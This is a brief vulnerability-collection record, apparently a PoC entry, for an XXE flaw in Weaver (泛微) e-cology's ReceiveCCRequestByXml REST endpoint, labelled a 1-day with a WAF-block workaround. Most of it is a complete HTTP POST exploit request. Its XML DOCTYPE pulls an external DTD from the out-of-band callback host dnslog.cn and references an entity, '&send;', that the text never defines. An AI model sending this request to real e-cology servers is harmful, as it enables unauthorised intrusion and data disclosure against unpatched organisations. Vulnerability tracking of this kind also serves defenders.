vendor = "泛微"
name = "泛微 e-cology ReceiveCCRequestByXml 接口XXE漏洞"
type = "XXE"
version = "未知"
path = "/rest/ofs/ReceiveCCRequestByXml"
detail = "POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/71.0.3578.98 Safari/537.36 Content-Type: application/xml <?xml version=\"1.0\" encoding=\"utf-8\"?> <!DOCTYPE syscode SYSTEM \"http://dnslog.cn\"> <M><syscode>&send;</syscode></M>"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
